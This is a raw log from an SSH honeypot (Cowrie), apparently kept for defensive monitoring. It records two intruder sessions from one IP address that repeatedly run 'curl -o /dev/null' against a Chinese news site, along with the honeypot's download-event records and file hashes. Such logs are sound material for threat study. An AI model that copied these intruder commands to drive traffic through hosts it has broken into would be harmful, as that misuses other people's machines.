{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.909818Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.920901Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.921984Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.928266Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.929524Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.931242Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.938787Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.953323Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.954221Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.961702Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.962979Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.971836Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.972897Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.982379Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.044790Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.045962Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.055300Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.056425Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.060395Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.078788Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.088623Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.089726Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.098250Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.099941Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.101117Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.105770Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.117045Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.127765Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.128792Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.141655Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.142905Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.144438Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.162838Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.166588Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.167506Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.183381Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.184404Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.203356Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.204450Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.206567Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.213742Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.222430Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.230734Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.231968Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.237885Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.246880Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.247875Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.248868Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.270698Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.271717Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.282703Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.283901Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.286304Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.297950Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.311640Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.312693Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.315758Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.318410Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.319601Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.321119Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.340592Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.350966Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.352020Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.355625Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.356691Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.390485Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.391668Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.395577Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.396426Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.412321Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.454711Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.467316Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.468333Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.470052Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.470941Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.482576Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.493011Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.502355Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.503410Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.507866Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.508791Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.534711Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.537929Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.540283Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.541162Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.546941Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.547852Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.554764Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.573855Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.578052Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.579063Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.585457Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.586358Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.591897Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.615216Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.616763Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.617853Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.620502Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.624386Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.625331Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.628223Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.655247Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.656020Z","src_ip":"212.227.125.160","session":"7541ed730449"}
